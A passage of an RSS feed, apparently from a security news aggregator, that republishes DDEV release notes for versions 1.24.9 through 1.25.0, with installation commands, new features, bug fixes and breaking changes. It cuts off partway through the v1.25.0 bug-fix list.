<li>docs(sponsor-banner): add link to sustainability article by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3582394761" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7788" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7788/hovercard" href="https://github.com/ddev/ddev/pull/7788">#7788</a></li>
<li>fix(self-upgrade): add docs for updating ddev package only, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3581678925" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7785" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7785/hovercard" href="https://github.com/ddev/ddev/issues/7785">#7785</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3582289589" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7787" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7787/hovercard" href="https://github.com/ddev/ddev/pull/7787">#7787</a></li>
<li>docs(commands): organize utility commands in alphabetical order, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3477852641" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7685" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7685/hovercard" href="https://github.com/ddev/ddev/pull/7685">#7685</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3583571582" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7789" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7789/hovercard" href="https://github.com/ddev/ddev/pull/7789">#7789</a></li>
<li>feat: add user flag for ssh/exec/hooks and x-ddev.ssh-shell for ssh, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3097474435" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7339" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7339/hovercard" href="https://github.com/ddev/ddev/issues/7339">#7339</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3581970487" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7786" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7786/hovercard" href="https://github.com/ddev/ddev/pull/7786">#7786</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ara303/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ara303">@ara303</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3432583948" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7639" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7639/hovercard" href="https://github.com/ddev/ddev/pull/7639">#7639</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/raphaelportmann/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/raphaelportmann">@raphaelportmann</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3469596003" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7677" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7677/hovercard" href="https://github.com/ddev/ddev/pull/7677">#7677</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JshGrn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JshGrn">@JshGrn</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3536973192" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7733" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7733/hovercard" href="https://github.com/ddev/ddev/pull/7733">#7733</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/ddev/ddev/compare/v1.24.8...v1.24.9"><tt>v1.24.8...v1.24.9</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v1.24.10]]></title>
<description><![CDATA[Installation
See the installation instructions for details, but it's easy:

macOS: brew install ddev/ddev/ddev or just brew upgrade ddev.
Linux: Use sudo apt-get update && sudo apt-get install ddev, see apt/yum installation
Windows and WSL2: Download the ddev_windows_amd64_installer.v1.24.10.exe;...]]></description>
<link>https://tsecurity.de/de/3497298/downloads/v12410/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3497298/downloads/v12410/</guid>
<pubDate>Thu, 07 May 2026 22:17:22 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Installation</h2>
<p>See the <a href="https://docs.ddev.com/en/stable/users/install/ddev-installation/" rel="nofollow">installation instructions</a> for details, but it's easy:</p>
<ul>
<li>macOS: <code>brew install ddev/ddev/ddev</code> or just <code>brew upgrade ddev</code>.</li>
<li>Linux: Use <code>sudo apt-get update &amp;&amp; sudo apt-get install ddev</code>, see <a href="https://docs.ddev.com/en/stable/users/install/ddev-installation/#linux" rel="nofollow">apt/yum installation</a></li>
<li>Windows and WSL2: Download the <a href="https://github.com/ddev/ddev/releases/download/v1.24.10/ddev_windows_amd64_installer.v1.24.10.exe">ddev_windows_amd64_installer.v1.24.10.exe</a>; you can run it for install or upgrade.</li>
<li>Consider <code>ddev delete images</code> or <code>ddev delete images --all</code> after upgrading to free up disk space used by previous Docker image versions. This does no harm.</li>
<li>Consider <code>ddev config --auto</code> to update your projects to current configuration.</li>
</ul>
<h2><g-emoji class="g-emoji" alias="warning">⚠️</g-emoji> Docker Compose requires newer Docker Buildx on Linux</h2>
<blockquote>
<p><strong>Error:</strong> <code>compose build requires buildx 0.17 or later</code></p>
</blockquote>
<p>This is caused by <a href="https://github.com/docker/compose/pull/13295" data-hovercard-type="pull_request" data-hovercard-url="/docker/compose/pull/13295/hovercard">upstream change</a>.</p>
<p><strong>Solution:</strong> Upgrade Docker using <a href="https://docs.docker.com/engine/install/" rel="nofollow">https://docs.docker.com/engine/install/</a></p>
<h2>Note</h2>
<p>This is a bugfix release. A regression in v1.24.9 prevented DDEV from updating the <code>/etc/hosts</code> file in CI environments (e.g., GitHub Actions) when using custom project TLDs:</p>
<ul>
<li>v1.24.10 reverts the change "Non-interactive mode now forced in non-tty environments"</li>
</ul>
<h2>Highlights</h2>
<ul>
<li>Support for PHP 8.5.0 RC 3 (note: some extensions are not yet available: apcu, imagick, memcached, redis, uploadprogress, xdebug, xhprof, xmlrpc, yaml)</li>
<li>Support for PostgreSQL 18</li>
<li><a href="https://docs.ddev.com/en/stable/users/usage/managing-projects/#access-another-project-via-https" rel="nofollow">Automatic HTTP/S communication between DDEV projects</a> - no need to manually configure <code>external_links</code></li>
<li><a href="https://docs.ddev.com/en/stable/users/configuration/config/#omit_project_name_by_default" rel="nofollow">Option to omit project names</a> in <code>.ddev/config.yaml</code> by default with <code>ddev config global --omit-project-name-by-default=true</code> - useful when working with multiple Git worktrees</li>
<li>Auto-discovery of <code>PLATFORM_PROJECT</code> and <code>PLATFORM_ENVIRONMENT</code> from existing config for <a href="https://docs.ddev.com/en/stable/users/providers/upsun/#upsun-per-project-configuration" rel="nofollow">Upsun Flex</a> and <a href="https://docs.ddev.com/en/stable/users/providers/platform/#upsun-fixedplatformsh-per-project-configuration" rel="nofollow">Upsun Fixed (Platform.sh)</a> provider integrations</li>
</ul>
<h2>Features</h2>
<ul>
<li>New <a href="https://docs.ddev.com/en/stable/users/usage/commands/#utility-diagnose" rel="nofollow"><code>ddev utility diagnose</code></a> command for quick diagnostics on your DDEV installation and current project</li>
<li>New <a href="https://docs.ddev.com/en/stable/users/usage/commands/#add-on-search" rel="nofollow"><code>ddev add-on search</code></a> command, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AkibaAT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AkibaAT">@AkibaAT</a></li>
<li>New <a href="https://docs.ddev.com/en/stable/users/usage/commands/#xdebug" rel="nofollow"><code>ddev xdebug info</code></a> command to display <code>xdebug_info()</code> output</li>
<li>Customize <a href="https://docs.ddev.com/en/stable/users/usage/commands/#describe" rel="nofollow"><code>ddev describe</code></a> output using the <a href="https://docs.ddev.com/en/stable/users/extend/custom-docker-services/#customizing-ddev-describe-output" rel="nofollow"><code>x-ddev.describe-*</code> extensions</a> - useful for <a href="https://addons.ddev.com/" rel="nofollow">add-ons</a></li>
<li>Change <a href="https://docs.ddev.com/en/stable/users/usage/commands/#ssh" rel="nofollow"><code>ddev ssh</code></a> shell using the <a href="https://docs.ddev.com/en/stable/users/extend/in-container-configuration/#changing-ddev-ssh-shell" rel="nofollow"><code>x-ddev.ssh-shell</code> extension</a> - useful for <a href="https://addons.ddev.com/" rel="nofollow">add-ons</a></li>
<li>New <code>--user</code>/<code>-u</code> flag for <a href="https://docs.ddev.com/en/stable/users/usage/commands/#exec" rel="nofollow"><code>ddev exec</code></a> and <a href="https://docs.ddev.com/en/stable/users/usage/commands/#ssh" rel="nofollow"><code>ddev ssh</code></a></li>
<li><code>exec</code> hooks now <a href="https://docs.ddev.com/en/stable/users/configuration/hooks/#exec-execute-a-shell-command-in-a-container-defaults-to-web-container" rel="nofollow">support the <code>user</code> field</a></li>
<li>New <code>pre-share</code> and <code>post-share</code> <a href="https://docs.ddev.com/en/stable/users/configuration/hooks/" rel="nofollow">hooks</a>. This can help change the required URL for <code>ddev share</code> in CMSs like WordPress and Magento2.</li>
<li>PostgreSQL connection support in <a href="https://docs.ddev.com/en/stable/users/usage/commands/#heidisql" rel="nofollow"><code>ddev heidisql</code></a>, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/raphaelportmann/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/raphaelportmann">@raphaelportmann</a></li>
<li>Show failed container logs on project start by running <code>DDEV_DEBUG=true ddev start</code></li>
<li>Enhanced <a href="https://docs.ddev.com/en/stable/users/configuration/config/#composer_root" rel="nofollow"><code>composer_root</code></a> support for app <a href="https://docs.ddev.com/en/stable/users/configuration/config/#type" rel="nofollow"><code>type</code></a> detection in CakePHP, Craft CMS, Laravel, Magento 2, Shopware 6, and Symfony, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vanWittlaer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vanWittlaer">@vanWittlaer</a> for initial PR for Shopware 6</li>
<li>Silence warnings about custom configuration files in the <code>.ddev</code> directory by adding <code>#ddev-silent-no-warn</code> to the file. <a href="https://docs.ddev.com/en/stable/users/usage/faq/#what-if-i-dont-like-the-settings-files-or-gitignores-ddev-creates" rel="nofollow">Documentation</a></li>
</ul>
<h2>Bug Fixes</h2>
<ul>
<li>PostgreSQL now runs as container user (mirrored from host user) instead of <code>postgres:postgres</code></li>
<li><a href="https://docs.ddev.com/en/stable/users/usage/commands/#describe" rel="nofollow"><code>ddev describe</code></a> now works with stopped or broken containers</li>
<li>Improved support for <code>DDEV_*</code> environment variables in PHP-based add-ons</li>
<li><code>APP_DEFAULT_LOCALE</code> is no longer overridden in CakePHP, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tyler36/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tyler36">@tyler36</a></li>
<li>Removed hardcoded <code>--server-id=0</code> parameter from MySQL/MariaDB startup, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cyppe/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cyppe">@cyppe</a></li>
<li>Fixed <code>docker-compose</code> warnings on <code>ddev start</code> when project root <code>.env</code> file contains dollar signs</li>
<li><a href="https://docs.ddev.com/en/stable/users/usage/commands/#add-on-get" rel="nofollow"><code>ddev add-on get</code></a> now retries without authentication on invalid GitHub token</li>
<li>Debug and verbose output now suppressed when using <code>--json-output</code>/<code>-j</code> flag</li>
<li>Improved container username sanitization with better fallback handling</li>
<li>Fixed <code>blackfire-php</code> installation for older PHP versions</li>
<li>Fixed bug with broken label in Mutagen volume when path to Docker socket is too long</li>
<li>Fixed intermittent hang in <code>ddev auth ssh</code> when SSH key is password-protected</li>
<li>Fixed hang in <code>ddev start</code> on macOS when temp directory permissions are broken after macOS upgrade (fixed in <code>docker-compose</code>)</li>
</ul>
<h2>Internal Improvements</h2>
<ul>
<li>PHP 8.1 no longer preinstalled in <a href="https://hub.docker.com/r/ddev/ddev-webserver" rel="nofollow">ddev/ddev-webserver</a> to reduce image size</li>
<li>Native ARM builder now used for building DDEV Docker images, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AkibaAT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AkibaAT">@AkibaAT</a></li>
<li><a href="https://docs.ddev.com/en/stable/users/usage/commands/#utility" rel="nofollow"><code>ddev utility</code></a> is now the primary command (<code>ddev debug</code> moved to alias)</li>
<li>Healthcheck added to <a href="https://hub.docker.com/r/ddev/ddev-xhgui" rel="nofollow">ddev/ddev-xhgui</a> image</li>
<li>Linux tests now run separately instead of in matrix, allowing single test restarts on failure</li>
<li>Improved support for <code>CI=true</code> in GitHub Actions</li>
<li>Vite setup documentation migrated into <a href="https://docs.ddev.com/en/stable/users/usage/vite/" rel="nofollow">DDEV docs</a>, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mandrasch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mandrasch">@mandrasch</a> for continuous support on the <a href="https://ddev.com/blog/working-with-vite-in-ddev/" rel="nofollow">blog article</a></li>
<li>Improved <a href="https://docs.ddev.com/en/stable/users/quickstart/" rel="nofollow">quickstarts</a> code block formatting to resolve copy/paste issues in some terminals</li>
<li>Added <code>docker-buildx</code> dependency for <a href="https://aur.archlinux.org/packages/ddev-bin" rel="nofollow">AUR</a> installation</li>
<li>Internet detection now uses <code>one.one.one.one</code> instead of <code>test.ddev.site</code></li>
<li>Replaced <code>GITHUB_OWNER</code> with <code>DDEV_GITHUB_OWNER</code> in <a href="https://ddev.com/install.sh" rel="nofollow">https://ddev.com/install.sh</a></li>
<li>Switched to lightweight <a href="https://mcr.microsoft.com/en-us/artifact/mar/devcontainers/base/about" rel="nofollow">debian-12</a> image for GitHub Codespaces</li>
<li>Removed Gitpod configuration (service is <a href="https://ona.com/stories/gitpod-classic-payg-sunset" rel="nofollow">no longer available</a>)</li>
</ul>
<h2>Minor Updates</h2>
<ul>
<li>PHP 8.3.27, 8.4.14, and 8.5.0 RC 3</li>
<li>Docker Compose v2.40.3</li>
<li>Updated <a href="https://docs.ddev.com/en/stable/users/quickstart/#moodle" rel="nofollow">quickstart</a> for <a href="https://moodledev.io/general/releases/5.1" rel="nofollow">Moodle 5.1</a></li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>fix: make install_ddev_head.sh install all binaries [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3586714417" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7794" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7794/hovercard" href="https://github.com/ddev/ddev/pull/7794">#7794</a></li>
<li>fix: write download result to stderr for docker-compose and mutagen [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3586644903" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7792" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7792/hovercard" href="https://github.com/ddev/ddev/pull/7792">#7792</a></li>
<li>fix: don't assume non-interactive mode for CI=true or non-tty, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3586059715" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7790" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7790/hovercard" href="https://github.com/ddev/ddev/issues/7790">#7790</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3586592309" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7791" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7791/hovercard" href="https://github.com/ddev/ddev/pull/7791">#7791</a></li>
<li>build(docker): bump images to v1.24.10 for release by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3586657732" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7793" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7793/hovercard" href="https://github.com/ddev/ddev/pull/7793">#7793</a></li>
<li>build: add mkcert to artifacts, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3586714417" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7794" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7794/hovercard" href="https://github.com/ddev/ddev/pull/7794">#7794</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3587421369" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7796" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7796/hovercard" href="https://github.com/ddev/ddev/pull/7796">#7796</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/ddev/ddev/compare/v1.24.9...v1.24.10"><tt>v1.24.9...v1.24.10</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v1.25.0]]></title>
<description><![CDATA[Installation
See the installation instructions for details, but it's easy:

macOS: brew install ddev/ddev/ddev or just brew upgrade ddev.
Linux: Use sudo apt-get update && sudo apt-get install ddev, see apt/yum installation
Windows and WSL2: Download the Windows Installer; you can run it for inst...]]></description>
<link>https://tsecurity.de/de/3497297/downloads/v1250/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3497297/downloads/v1250/</guid>
<pubDate>Thu, 07 May 2026 22:17:20 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Installation</h2>
<p>See the <a href="https://docs.ddev.com/en/stable/users/install/ddev-installation/" rel="nofollow">installation instructions</a> for details, but it's easy:</p>
<ul>
<li>macOS: <code>brew install ddev/ddev/ddev</code> or just <code>brew upgrade ddev</code>.</li>
<li>Linux: Use <code>sudo apt-get update &amp;&amp; sudo apt-get install ddev</code>, see <a href="https://docs.ddev.com/en/stable/users/install/ddev-installation/#linux" rel="nofollow">apt/yum installation</a></li>
<li>Windows and WSL2: Download the <a href="https://ddev.com/download/" rel="nofollow">Windows Installer</a>; you can run it for install or upgrade. <code>winget install --interactive ddev</code> works too.<br>
<g-emoji class="g-emoji" alias="warning">⚠️</g-emoji> <strong>Traditional Windows users (not WSL2)</strong>: If needed, the installer will prompt you to uninstall the previous system-wide installation to avoid conflicts with the new per-user installation.</li>
<li>Consider <code>ddev delete images</code> or <code>ddev delete images --all</code> after upgrading to free up disk space used by previous Docker image versions. This does no harm.</li>
<li>Consider <code>ddev config --auto</code> to update your projects to current configuration.</li>
</ul>
<h2>Highlights</h2>
<h3>New defaults</h3>
<ul>
<li>Debian <strong>Trixie</strong> is now the base image for <code>ddev-webserver</code> and <code>ddev-ssh-agent</code> (replacing Debian Bookworm). See <a href="https://www.debian.org/releases/trixie/release-notes/issues.html" rel="nofollow">Issues to be aware of for Trixie</a>.<br>
(Some projects with complex Dockerfiles or obsolete <code>webimage_extra_packages</code> may need to be updated.)</li>
<li><a href="https://ddev.com/blog/xhgui-feature/" rel="nofollow"><strong>XHGui</strong></a> is now the default profiler (prepend mode remains available via <code>ddev config global --xhprof-mode=prepend</code>).</li>
<li><strong>Node.js v24</strong> is default in new projects (replacing Node.js v22)</li>
<li><strong>PHP 8.4</strong> is default in new projects (replacing PHP 8.3)</li>
<li><strong>MariaDB 11.8</strong> is default in new projects (replacing MariaDB 10.11)</li>
</ul>
<h3>Additional highlights</h3>
<ul>
<li>Completely revised <strong><a href="https://ddev.com/download/" rel="nofollow">Windows installer</a></strong> now uses <strong>per-user installation</strong> for WSL2 or traditional Windows (no admin account required)</li>
<li>Reworked configurable <code>ddev share</code> command with a new <strong>cloudflared</strong> share provider, see <a href="https://docs.ddev.com/en/stable/users/topics/sharing/" rel="nofollow">new docs</a> and <a href="https://ddev.com/blog/share-providers/" rel="nofollow">blog</a></li>
<li>Add <code>ddev utility xdebug-diagnose</code> command, see <a href="https://ddev.com/blog/xdebug-step-debugging-understanding-and-troubleshooting/" rel="nofollow">Xdebug in DDEV: Understanding, Debugging, and Troubleshooting Step Debugging</a></li>
<li>Add <code>ddev utility mutagen-diagnose</code> command, see <a href="https://ddev.com/blog/mutagen-functionality-issues-debugging/" rel="nofollow">Mutagen in DDEV: Functionality, Issues, and Debugging</a></li>
<li><code>ddev pantheon pull</code> got new <code>DDEV_PANTHEON_SITE</code>, <code>DDEV_PANTHEON_ENVIRONMENT</code>, <code>DDEV_USE_PANTHEON_BACKUP</code> variables, see updated <a href="https://docs.ddev.com/en/stable/users/providers/pantheon/" rel="nofollow">Pantheon Integration</a></li>
<li><code>ddev snapshot</code> now uses <strong>zstd</strong> instead of gzip for significantly faster exports and restores, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/deviantintegral/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/deviantintegral">@deviantintegral</a></li>
<li>Add <a href="https://docs.ddev.com/en/stable/users/quickstart/#codeigniter" rel="nofollow">CodeIgniter</a> project type, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Franky5831/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Franky5831">@Franky5831</a></li>
<li>Experimental support for <strong>Podman</strong> and <strong>Docker Rootless</strong>, see <a href="https://ddev.com/blog/podman-and-docker-rootless/" rel="nofollow">Podman and Docker Rootless in DDEV</a></li>
<li><a href="https://github.com/ddev/ddev-frankenphp"><code>ddev-frankenphp</code></a> is an official add-on with many improvements, see updated <a href="https://ddev.com/blog/using-frankenphp-with-ddev/" rel="nofollow">Using FrankenPHP with DDEV</a></li>
</ul>
<h2>Features</h2>
<ul>
<li>New <a href="https://docs.ddev.com/en/stable/users/quickstart/#wagtail-python-generic" rel="nofollow">Wagtail (Python, Generic)</a> quickstart</li>
<li>Added Drupal 12 project type (development branch). Drupal 12 has not yet been released, but it's showing up in developer builds already.</li>
<li>New <code>--no-cache</code> flag for <code>ddev start</code> and <code>ddev restart</code> (as an alternative to <code>ddev utility rebuild</code>)</li>
<li>Improved support for non-Codespaces devcontainers</li>
<li>Refactored <code>ddev add-on</code> subcommands with a fallback mechanism to avoid GitHub API rate limits</li>
<li>Much faster <code>ddev add-on list</code> and <code>ddev add-on search</code></li>
<li>Shell autocompletion for <code>ddev add-on get &lt;TAB&gt;</code></li>
<li>SELinux enviroment detection (auto <a href="https://docs.docker.com/engine/storage/bind-mounts/#configure-the-selinux-label" rel="nofollow">SELinux label</a> for bind mounts)</li>
<li>Support for additional SSH config files (<code>*.conf</code>) in <code>.ddev/homeadditions/.ssh/config.d</code> (global or project-level), see <a href="https://docs.ddev.com/en/stable/users/extend/in-container-configuration/#ssh-configuration" rel="nofollow">SSH confugation</a>, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codebymikey/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codebymikey">@codebymikey</a></li>
<li>More portable database collations. Databases imported and exported from newer MySQL and MariaDB are less likely to have problems with proprietary collations like <code>utf8mb4_0900_ai_ci</code> and <code>utf8mb4_uca1400_ai_ci</code> as they use more traditional collations in DDEV.</li>
<li>DBeaver support for traditional Windows, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ddubau/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ddubau">@ddubau</a></li>
</ul>
<h2>Traefik Router Features, Fixes, and Breaking Changes</h2>
<ul>
<li>Project Traefik configuration is now standardized to a single file: <code>.ddev/traefik/config/&lt;projectname&gt;.yaml</code> (all other files are ignored). See <a href="https://github.com/ddev/ddev/issues/8047" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8047/hovercard">issue #8047</a>.</li>
<li>Add any global Traefik configuration inside the <code>$HOME/.ddev/traefik/custom-global-config/</code> directory</li>
<li>Removed <code>defaultRuleSyntax: v2</code> and <code>ruleSyntax: v3</code> from Traefik configs. Traefik v3 syntax is now used by default.</li>
<li>Traefik configuration errors now show warnings instead of failing hard</li>
<li>Improved Traefik health checks for more reliable router verification</li>
<li>Prevent unnecessary router recreation when bound ports are unchanged</li>
<li><code>ddev-router</code> is no longer stopped automatically when the last project is stopped, use <code>ddev poweroff</code> to fully stop the router</li>
<li>Traefik monitoring port is now bound to localhost only, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JUVOJustin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JUVOJustin">@JUVOJustin</a></li>
<li>Paused or stopped projects are excluded from Traefik configuration</li>
<li>Bypass router port checks when all ports appear busy (for example, when endpoint security software intercepts localhost traffic)</li>
</ul>
<h2>Breaking Changes / Removals</h2>
<ul>
<li>Default <code>xhprof_mode</code> changed from "prepend" to "xhgui" but you can easily change it back</li>
<li>Removed <code>ddev utility capabilities</code>, use <a href="https://docs.ddev.com/en/stable/users/configuration/config/#ddev_version_constraint" rel="nofollow"><code>ddev_version_constraint</code></a> instead in add-ons.</li>
<li>Removed NFS support, use <a href="https://docs.ddev.com/en/stable/users/install/performance/#filesystem-performance-mutagen" rel="nofollow">Mutagen</a></li>
<li>Removed <code>ddev service</code>, custom services can be installed/uninstalled via <a href="https://docs.ddev.com/en/stable/users/usage/commands/#add-on" rel="nofollow"><code>ddev add-on</code></a></li>
<li>Removed <code>ddev nvm</code>, install the <a href="https://github.com/ddev/ddev-nvm"><code>ddev-nvm</code></a> add-on if needed</li>
<li>Removed obsolete or non-functional commands and command aliases:
<ul>
<li><code>ddev restore-snapshot</code></li>
<li><code>ddev auth pantheon</code></li>
<li><code>ddev config pantheon</code></li>
</ul>
</li>
<li>Removed obsolete <code>ddev config</code> flags:
<ul>
<li><code>--mutagen-enabled</code> (use <code>--performance-mode=mutagen</code>)</li>
<li><code>--upload-dir</code> (use <code>--upload-dirs</code>)</li>
<li><code>--db-image</code>, <code>--db-image-default</code> (never documented or used)</li>
</ul>
</li>
<li>Removed deprecated <code>ddev config</code> flag aliases:
<ul>
<li><code>--http-port</code> → <code>--router-http-port</code></li>
<li><code>--https-port</code> → <code>--router-https-port</code></li>
<li><code>--mailhog-port</code> → <code>--mailpit-http-port</code></li>
<li><code>--mailhog-https-port</code> → <code>--mailpit-https-port</code></li>
<li><code>--projectname</code> → <code>--project-name</code></li>
<li><code>--projecttype</code>, <code>--apptype</code> → <code>--project-type</code></li>
<li><code>--sitename</code> → <code>--project-name</code></li>
<li><code>--image-defaults</code> → <code>--web-image-default</code></li>
</ul>
</li>
<li>Removed <code>nginx.org</code> repository from <code>ddev-webserver</code>, now using nginx from the Debian Trixie repository</li>
<li>Migrated all APT repositories in <code>ddev-webserver</code> from legacy <code>*.list</code> files to <code>*.sources</code> (deb822) format</li>
</ul>
<h2>Bug Fixes</h2>
<ul>
<li>Fixed <code>ddev heidisql</code> support for multiple databases</li>
<li>Fixed PostgreSQL builds when overriding the database username</li>
<li>Fixed Windows installer behavior on non-English Windows locales</li>
<li>Improved Bash detection for non-admin Windows installations</li>
<li>Fixed <code>host.docker.internal</code> IP detection for WSL2 mirrored mode with virtual adapters present</li>
